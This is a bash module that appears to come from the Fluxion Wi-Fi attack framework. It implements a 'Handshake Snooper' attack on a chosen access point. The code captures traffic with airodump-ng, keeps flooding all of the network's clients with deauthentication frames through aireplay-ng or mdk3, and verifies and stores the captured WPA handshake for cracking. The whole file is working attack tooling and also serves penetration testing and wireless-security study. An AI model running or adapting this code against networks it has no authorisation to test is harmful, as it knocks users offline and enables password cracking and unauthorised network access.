#!/bin/bash ########################### < Handshake Snooper Parameters > ########################### HandshakeSnooperState="Not Ready" ################################# < Handshake Snooper > ################################ function handshake_snooper_arbiter_daemon() { if [ ${#@} -lt 1 -o "$HandshakeSnooperState" != "Running" ]; then return 1; fi # Start daemon in the running state to continue execution until aborted, # or until a hash has been verified to exist in the capture file. # NOTE: The line below must remain before trap to prevent race conditions. local handshake_snooper_arbiter_daemon_state="running" function handshake_snooper_arbiter_daemon_abort() { handshake_snooper_arbiter_daemon_state="aborted" if [ "$handshake_snooper_arbiter_daemon_viewerPID" ] then kill $handshake_snooper_arbiter_daemon_viewerPID fi handshake_snooper_stop_deauthenticator handshake_snooper_stop_captor echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperArbiterAbortedWarning" >> "$FLUXIONWorkspacePath/handshake_snooper.log" exit 2 } trap handshake_snooper_arbiter_daemon_abort SIGABRT source lib/HashUtils.sh source lib/ColorUtils.sh # Cleanup files we've previously created to avoid conflicts. sandbox_remove_workfile "$FLUXIONWorkspacePath/capture/dump-*" # Display some feedback to the user to assure verifier is working. xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg "#000000" -fg "#CCCCCC" -title "Handshake Snooper Arbiter Log" -e "tail -f \"$FLUXIONWorkspacePath/handshake_snooper.log\"" & local handshake_snooper_arbiter_daemon_viewerPID=$! echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperStartingArbiterNotice" > "$FLUXIONWorkspacePath/handshake_snooper.log" handshake_snooper_start_captor handshake_snooper_start_deauthenticator local handshake_snooper_arbiter_daemon_verified=1 # Assume it hasn't been verified yet (1 => false/error). # Keep snooping and verifying until we've got a valid hash from the capture file. while [ $handshake_snooper_arbiter_daemon_verified -ne 0 ]; do echo -e "[$(env -i date '+%H:%M:%S')] `io_dynamic_output $HandshakeSnooperSnoopingForNSecondsNotice`" >> "$FLUXIONWorkspacePath/handshake_snooper.log" sleep $HANDSHAKEVerifierInterval & wait $! # Using wait to asynchronously catch flags while waiting. # If synchronously searching, stop the captor and deauthenticator before checking. if [ "$HANDSHAKEVerifierSynchronicity" = "blocking" ]; then echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperStoppingForVerifierNotice" >> "$FLUXIONWorkspacePath/handshake_snooper.log" handshake_snooper_stop_deauthenticator handshake_snooper_stop_captor mv "$FLUXIONWorkspacePath/capture/dump-01.cap" "$FLUXIONWorkspacePath/capture/recent.cap" else pyrit -r "$FLUXIONWorkspacePath/capture/dump-01.cap" -o "$FLUXIONWorkspacePath/capture/recent.cap" stripLive &> $FLUXIONOutputDevice fi echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperSearchingForHashesNotice" >> "$FLUXIONWorkspacePath/handshake_snooper.log" hash_check_handshake "$HANDSHAKEVerifierIdentifier" "$FLUXIONWorkspacePath/capture/recent.cap" "$APTargetSSID" "$APTargetMAC" handshake_snooper_arbiter_daemon_verified=$? # If synchronously searching, restart the captor and deauthenticator after checking. if [ "$HANDSHAKEVerifierSynchronicity" = "blocking" -a $handshake_snooper_arbiter_daemon_verified -ne 0 ]; then sandbox_remove_workfile "$FLUXIONWorkspacePath/capture/*" handshake_snooper_start_captor handshake_snooper_start_deauthenticator fi done # Assure all processes are stopped before proceeding. handshake_snooper_stop_deauthenticator handshake_snooper_stop_captor local completionTime=$(env -i date '+%H:%M:%S') echo -e "[$completionTime] $HandshakeSnooperArbiterSuccededNotice" >> "$FLUXIONWorkspacePath/handshake_snooper.log" echo -e "[$completionTime] $HandshakeSnooperArbiterCompletedTip" >> "$FLUXIONWorkspacePath/handshake_snooper.log" # Assure we've got a directory to store hashes into. mkdir -p "$FLUXIONPath/attacks/Handshake Snooper/handshakes/" # Move handshake to storage if one was acquired. mv "$FLUXIONWorkspacePath/capture/recent.cap" "$FLUXIONPath/attacks/Handshake Snooper/handshakes/$APTargetSSIDClean-$APTargetMAC.cap" # Signal parent process the verification terminated. kill -s SIGABRT $1 } function handshake_snooper_stop_captor() { if [ "$HANDSHAKECaptorPID" ] then kill -s SIGINT $HANDSHAKECaptorPID &> $FLUXIONOutputDevice fi HANDSHAKECaptorPID="" } function handshake_snooper_start_captor() { if [ "$HANDSHAKECaptorPID" ]; then return 0; fi if [ "$HandshakeSnooperState" != "Running" ]; then return 1; fi handshake_snooper_stop_captor xterm $FLUXIONHoldXterm -title "Handshake Captor (CH $APTargetChannel)" $TOPLEFT -bg "#000000" -fg "#FFFFFF" -e \ airodump-ng --ignore-negative-one -d $APTargetMAC -w "$FLUXIONWorkspacePath/capture/dump" -c $APTargetChannel -a $WIMonitor & local parentPID=$! while [ ! "$HANDSHAKECaptorPID" ]; do sleep 1 & wait $! HANDSHAKECaptorPID=$(pgrep -P $parentPID) done } function handshake_snooper_stop_deauthenticator() { if [ "$HANDSHAKEDeauthenticatorPID" ] then kill $HANDSHAKEDeauthenticatorPID &> $FLUXIONOutputDevice fi HANDSHAKEDeauthenticatorPID="" } function handshake_snooper_start_deauthenticator() { if [ "$HANDSHAKEDeauthenticatorPID" ]; then return 0; fi if [ "$HandshakeSnooperState" != "Running" ]; then return 1; fi handshake_snooper_stop_deauthenticator # Prepare deauthenticators case "$HANDSHAKEDeauthenticatorIdentifier" in "$HandshakeSnooperMdk3MethodOption") echo "$APTargetMAC" > $FLUXIONWorkspacePath/mdk3_blacklist.lst esac # Start deauthenticators. case "$HANDSHAKEDeauthenticatorIdentifier" in "$HandshakeSnooperAireplayMethodOption") xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $APTargetSSID" -e \ "while true; do sleep 7; timeout 3 aireplay-ng --deauth=100 -a $APTargetMAC --ignore-negative-one $WIMonitor; done" & HANDSHAKEDeauthenticatorPID=$!;; "$HandshakeSnooperMdk3MethodOption") xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $APTargetSSID" -e \ "while true; do sleep 7; timeout 3 mdk3 $WIMonitor d -b $FLUXIONWorkspacePath/mdk3_blacklist.lst -c $APTargetChannel; done" & HANDSHAKEDeauthenticatorPID=$!;; esac } function handshake_snooper_unset_deauthenticator_identifier() { HANDSHAKEDeauthenticatorIdentifier="" } function handshake_snooper_set_deauthenticator_identifier() { if [ "$HANDSHAKEDeauthenticatorIdentifier" ]; then return 0; fi handshake_snooper_unset_deauthenticator_identifier local methods=("$HandshakeSnooperMonitorMethodOption" "$HandshakeSnooperAireplayMethodOption" "$HandshakeSnooperMdk3MethodOption" "$FLUXIONGeneralBackOption") io_query_choice "$HandshakeSnooperMethodQuery" methods[@] HANDSHAKEDeauthenticatorIdentifier=$IOQueryChoice echo if [ "$HANDSHAKEDeauthenticatorIdentifier" = "$FLUXIONGeneralBackOption" ]; then handshake_snooper_unset_deauthenticator_identifier return 1 fi } function handshake_snooper_unset_verifier_identifier() { HANDSHAKEVerifierIdentifier="" } function handshake_snooper_set_verifier_identifier() { if [ "$HANDSHAKEVerifierIdentifier" ]; then return 0; fi handshake_snooper_unset_verifier_identifier local choices=("$FLUXIONHashVerificationMethodPyritOption" "$FLUXIONHashVerificationMethodAircrackOption" "$FLUXIONGeneralBackOption") io_query_choice "$FLUXIONHashVerificationMethodQuery" choices[@] echo case "$IOQueryChoice" in "$FLUXIONHashVerificationMethodPyritOption") HANDSHAKEVerifierIdentifier="pyrit";; "$FLUXIONHashVerificationMethodAircrackOption") HANDSHAKEVerifierIdentifier="aircrack-ng";; "$FLUXIONGeneralBackOption") handshake_snooper_unset_verifier_identifier return 1;; esac } function handshake_snooper_unset_verifier_interval() { HANDSHAKEVerifierInterval="" } function handshake_snooper_set_verifier_interval() { if [ "$HANDSHAKEVerifierInterval" ]; then return 0; fi handshake_snooper_unset_verifier_interval local choices=("$HandshakeSnooperVerifierInterval30SOption" "$HandshakeSnooperVerifierInterval60SOption" "$HandshakeSnooperVerifierInterval90SOption" "$FLUXIONGeneralBackOption") io_query_choice "$HandshakeSnooperVerifierIntervalQuery" choices[@] case "$IOQueryChoice" in "$HandshakeSnooperVerifierInterval30SOption") HANDSHAKEVerifierInterval=30;; "$HandshakeSnooperVerifierInterval60SOption") HANDSHAKEVerifierInterval=60;; "$HandshakeSnooperVerifierInterval90SOption") HANDSHAKEVerifierInterval=90;; "$FLUXIONGeneralBackOption") handshake_snooper_unset_verifier_interval return 1;; esac } function handshake_snooper_unset_verifier_synchronicity() { HANDSHAKEVerifierSynchronicity="" } function handshake_snooper_set_verifier_synchronicity() { if [ "$HANDSHAKEVerifierSynchronicity" ]; then return 0; fi handshake_snooper_unset_verifier_synchronicity local choices=("$HandshakeSnooperVerifierSynchronicityAsynchronousOption" "$HandshakeSnooperVerifierSynchronicitySynchronousOption" "$FLUXIONGeneralBackOption") io_query_choice "$HandshakeSnooperVerifierSynchronicityQuery" choices[@] case "$IOQueryChoice" in "$HandshakeSnooperVerifierSynchronicityAsynchronousOption") HANDSHAKEVerifierSynchronicity="non-blocking";; "$HandshakeSnooperVerifierSynchronicitySynchronousOption") HANDSHAKEVerifierSynchronicity="blocking";; "$FLUXIONGeneralBackOption") handshake_snooper_unset_verifier_synchronicity return 1;; esac } function unprep_attack() { HandshakeSnooperState="Not Ready" handshake_snooper_unset_verifier_synchronicity handshake_snooper_unset_verifier_interval handshake_snooper_unset_verifier_identifier handshake_snooper_unset_deauthenticator_identifier sandbox_remove_workfile "$FLUXIONWorkspacePath/capture" } function prep_attack() { mkdir -p "$FLUXIONWorkspacePath/capture" while true; do handshake_snooper_set_deauthenticator_identifier; if [ $? -ne 0 ]; then break; fi handshake_snooper_set_verifier_identifier; if [ $? -ne 0 ]; then handshake_snooper_unset_deauthenticator_identifier; continue fi handshake_snooper_set_verifier_interval; if [ $? -ne 0 ]; then handshake_snooper_unset_verifier_identifier; continue fi handshake_snooper_set_verifier_synchronicity; if [ $? -ne 0 ]; then handshake_snooper_unset_verifier_interval; continue; fi HandshakeSnooperState="Ready" break done # Check for handshake abortion. if [ "$HandshakeSnooperState" != "Ready" ]; then unprep_attack return 1; fi } function stop_attack() { if [ "$HANDSHAKEArbiterPID" ]; then kill -s SIGABRT $HANDSHAKEArbiterPID &> $FLUXIONOutputDevice fi HANDSHAKEArbiterPID="" HandshakeSnooperState="Stopped" } function start_attack() { if [ "$HandshakeSnooperState" = "Running" ]; then return 0; fi if [ "$HandshakeSnooperState" != "Ready" ]; then return 1; fi HandshakeSnooperState="Running" handshake_snooper_arbiter_daemon $$ &> $FLUXIONOutputDevice & HANDSHAKEArbiterPID=$! } # FLUXSCRIPT END